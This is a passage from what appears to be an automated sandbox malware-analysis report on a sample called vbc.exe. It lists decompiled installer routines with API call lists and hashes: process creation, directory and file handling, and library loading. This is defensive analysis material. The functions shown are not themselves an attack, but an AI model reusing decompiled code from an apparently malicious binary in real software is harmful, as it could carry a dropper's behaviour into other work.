          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: File$Attributes$DeleteDirectoryRemove
          • String ID:
          • API String ID: 1655745494-0
          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
          • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
          • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 621 406ae6-406afe WaitForSingleObject 622 406b0e-406b10 621->622 623 406b00-406b0c call 406a77 WaitForSingleObject 622->623 624 406b12-406b25 GetExitCodeProcess 622->624 623->622
          C-Code - Quality: 100%
          			E00406AE6(void* __ecx, void* _a4) {
          				long _v8;
          				long _t6;
          
          				_t6 = WaitForSingleObject(_a4, 0x64);
          				while(_t6 == 0x102) {
          					E00406A77(0xf);
          					_t6 = WaitForSingleObject(_a4, 0x64);
          				}
          				GetExitCodeProcess(_a4,  &_v8); // executed
          				return _v8;
          			}





          0x00406af7
          0x00406b0e
          0x00406b02
          0x00406b0c
          0x00406b0c
          0x00406b19
          0x00406b25

          APIs
          • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
          • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: ObjectSingleWait$CodeExitProcess
          • String ID:
          • API String ID: 2567322000-0
          • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
          • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
          • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
          • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 627 403c2b-403c3a 628 403c46-403c4e 627->628 629 403c3c-403c3f CloseHandle 627->629 630 403c50-403c53 CloseHandle 628->630 631 403c5a-403c66 call 403c88 call 405d7a 628->631 629->628 630->631 635 403c6b-403c6c 631->635
          C-Code - Quality: 100%
          			E00403C2B() {
          				void* _t1;
          				void* _t2;
          				void* _t4;
          				signed int _t11;
          
          				_t1 =  *0x40a018; // 0xffffffff
          				if(_t1 != 0xffffffff) {
          					CloseHandle(_t1); // executed
          					 *0x40a018 =  *0x40a018 | 0xffffffff;
          				}
          				_t2 =  *0x40a01c; // 0xffffffff
          				if(_t2 != 0xffffffff) {
          					CloseHandle(_t2);
          					 *0x40a01c =  *0x40a01c | 0xffffffff;
          					_t11 =  *0x40a01c;
          				}
          				E00403C88();
          				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed
          				return _t4;
          			}







          0x00403c2b
          0x00403c3a
          0x00403c3d
          0x00403c3f
          0x00403c3f
          0x00403c46
          0x00403c4e
          0x00403c51
          0x00403c53
          0x00403c53
          0x00403c53
          0x00403c5a
          0x00403c66
          0x00403c6c

          APIs
          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
          • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CloseHandle
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 2962429428-4017390910
          • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
          • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
          • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
          • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe8 641 401631-401634 636->641 642 4015d7-4015ea call 405f6a 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 641->645 649 401604-401607 call 405c1c 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 644->660 661 40292e-402935 644->661 645->660 663 40165b-40165e 645->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c39 650->653 653->649 667 4015fa-4015fd call 405b9f 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
          C-Code - Quality: 86%
          			E004015C1(short __ebx, void* __eflags) {
          				void* _t17;
          				int _t23;
          				void* _t25;
          				signed char _t26;
          				short _t28;
          				short _t31;
          				short* _t34;
          				void* _t36;
          
          				_t28 = __ebx;
          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
          				_t17 = E00405FE8(_t16);
          				_t32 = _t17;
          				if(_t17 != __ebx) {
          					do {
          						_t34 = E00405F6A(_t32, 0x5c);
          						_t31 =  *_t34;
          						 *_t34 = _t28;
          						if(_t31 != _t28) {
          							L5:
          							_t25 = E00405C1C( *(_t36 + 8));
          						} else {
          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
          								goto L5;
          							} else {
          								_t25 = E00405B9F( *(_t36 + 8)); // executed
          							}
          						}
          						if(_t25 != _t28) {
          							if(_t25 != 0xb7) {
          								L9:
          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
          							} else {
          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
          								if((_t26 & 0x00000010) == 0) {
          									goto L9;
          								}
          							}
          						}
          						 *_t34 = _t31;
          						_t32 = _t34 + 2;
          					} while (_t31 != _t28);
          				}
          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
          					_push(0xfffffff5);
          					E00401423();
          				} else {
          					E00401423(0xffffffe6);
          					E0040666E(0x7b4000,  *(_t36 + 8));
          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
          					if(_t23 == 0) {
          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
          					}
          				}
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
          				return 0;
          			}











          0x004015c1
          0x004015c9
          0x004015cc
          0x004015d1
          0x004015d5
          0x004015d7
          0x004015df
          0x004015e1
          0x004015e4
          0x004015ea
          0x00401604
          0x00401607
          0x004015ec
          0x004015ec
          0x004015ef
          0x00000000
          0x004015fa
          0x004015fd
          0x004015fd
          0x004015ef
          0x0040160e
          0x00401615
          0x00401624
          0x00401624
          0x00401617
          0x0040161a
          0x00401622
          0x00000000
          0x00000000
          0x00401622
          0x00401615
          0x00401627
          0x0040162b
          0x0040162c
          0x004015d7
          0x00401634
          0x00401663
          0x004022f1
          0x00401636
          0x00401638
          0x00401645
          0x0040164d
          0x00401655
          0x0040165b
          0x0040165b
          0x00401655
          0x00402c2d
          0x00402c39

          APIs
            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
            • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
          • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CharNext$Directory$AttributesCreateCurrentFile
          • String ID:
          • API String ID: 1892508949-0
          • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
          • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
          • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
          • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 53%
          			E00406045(void* __eflags, intOrPtr _a4) {
          				int _t11;
          				signed char* _t12;
          				long _t16;
          				intOrPtr _t18;
          				intOrPtr* _t21;
          				signed int _t23;
          
          				E0040666E(0x7a4790, _a4);
          				_t21 = E00405FE8(0x7a4790);
          				if(_t21 != 0) {
          					E004068F5(_t21);
          					if(( *0x7a8ab8 & 0x00000080) == 0) {
          						L5:
          						_t23 = _t21 - 0x7a4790 >> 1;
          						while(1) {
          							_t11 = lstrlenW(0x7a4790);
          							_push(0x7a4790);
          							if(_t11 <= _t23) {
          								break;
          							}
          							_t12 = E004069A4();
          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
          								E00405F89(0x7a4790);
          								continue;
          							} else {
          								goto L1;
          							}
          						}
          						E00405F3D();
          						_t16 = GetFileAttributesW(??); // executed
          						return 0 | _t16 != 0xffffffff;
          					}
          					_t18 =  *_t21;
          					if(_t18 == 0 || _t18 == 0x5c) {
          						goto L1;
          					} else {
          						goto L5;
          					}
          				}
          				L1:
          				return 0;
          			}









          0x00406051
          0x0040605c
          0x00406060
          0x00406067
          0x00406073
          0x00406083
          0x00406085
          0x0040609d
          0x0040609e
          0x004060a5
          0x004060a6
          0x00000000
          0x00000000
          0x00406089
          0x00406090
          0x00406098
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00406090
          0x004060a8
          0x004060ae
          0x00000000
          0x004060bc
          0x00406075
          0x0040607b
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0040607b
          0x00406062
          0x00000000

          APIs
            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
          • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
          • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CharNext$AttributesFilelstrcpynlstrlen
          • String ID:
          • API String ID: 3248276644-0
          • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
          • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
          • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
          • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 69%
          			E00401389(signed int _a4) {
          				intOrPtr* _t6;
          				void* _t8;
          				void* _t10;
          				signed int _t11;
          				void* _t12;
          				signed int _t16;
          				signed int _t17;
          				void* _t18;
          
          				_t17 = _a4;
          				while(_t17 >= 0) {
          					_t6 = _t17 * 0x1c +  *0x7a8ad0;
          					if( *_t6 == 1) {
          						break;
          					}
          					_push(_t6); // executed
          					_t8 = E00401434(); // executed
          					if(_t8 == 0x7fffffff) {
          						return 0x7fffffff;
          					}
          					_t10 = E0040136D(_t8);
          					if(_t10 != 0) {
          						_t11 = _t10 - 1;
          						_t16 = _t17;
          						_t17 = _t11;
          						_t12 = _t11 - _t16;
          					} else {
          						_t12 = _t10 + 1;
          						_t17 = _t17 + 1;
          					}
          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
          						 *0x7a7a8c =  *0x7a7a8c + _t12;
          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
          					}
          				}
          				return 0;
          			}











          0x0040138a
          0x004013fa
          0x0040139b
          0x004013a0
          0x00000000
          0x00000000
          0x004013a2
          0x004013a3
          0x004013ad
          0x00000000
          0x00401404
          0x004013b0
          0x004013b7
          0x004013bd
          0x004013be
          0x004013c0
          0x004013c2
          0x004013b9
          0x004013b9
          0x004013ba
          0x004013ba
          0x004013c9
          0x004013cb
          0x004013f4
          0x004013f4
          0x004013c9
          0x00000000

          APIs
          • MulDiv.KERNEL32 ref: 004013E4
          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
          • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
          • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
          • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00405C51(WCHAR* _a4) {
          				struct _PROCESS_INFORMATION _v20;
          				int _t7;
          
          				0x7a4f90->cb = 0x44;
          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
          				if(_t7 != 0) {
          					CloseHandle(_v20.hThread);
          					return _v20.hProcess;
          				}
          				return _t7;
          			}





          0x00405c5a
          0x00405c7a
          0x00405c82
          0x00405c87
          0x00000000
          0x00405c8d
          0x00405c91

          APIs
          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
          • CloseHandle.KERNEL32(?), ref: 00405C87
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CloseCreateHandleProcess
          • String ID:
          • API String ID: 3712363035-0
          • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
          • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
          • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
          • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00406A3B(signed int _a4) {
          				struct HINSTANCE__* _t5;
          				signed int _t10;
          
          				_t10 = _a4 << 3;
          				_t8 =  *(_t10 + 0x40a410);
          				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
          				if(_t5 != 0) {
          					L2:
          					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
          				}
          				_t5 = E004069CB(_t8); // executed
          				if(_t5 == 0) {
          					return 0;
          				}
          				goto L2;
          			}





          0x00406a43
          0x00406a46
          0x00406a4d
          0x00406a55
          0x00406a61
          0x00000000
          0x00406a68
          0x00406a58
          0x00406a5f
          0x00000000
          0x00406a70
          0x00000000

          APIs
          • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
            • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
            • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
            • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
          • String ID:
          • API String ID: 2547128583-0
          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
          • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
          • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E0040615E(WCHAR* _a4, long _a8, long _a12) {
          				signed int _t5;
          				void* _t6;
          
          				_t5 = GetFileAttributesW(_a4); // executed
          				asm("sbb ecx, ecx");
          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
          				return _t6;
          			}





          0x00406162
          0x0040616f
          0x00406184
          0x0040618a

          APIs
          • GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: File$AttributesCreate
          • String ID:
          • API String ID: 415043291-0
          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00406139(WCHAR* _a4) {
          				signed char _t3;
          				signed char _t7;
          
          				_t3 = GetFileAttributesW(_a4); // executed
          				_t7 = _t3;
          				if(_t7 != 0xffffffff) {
          					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
          				}
          				return _t7;
          			}





          0x0040613e
          0x00406144
          0x00406149
          0x00406152
          0x00406152
          0x0040615b

          APIs
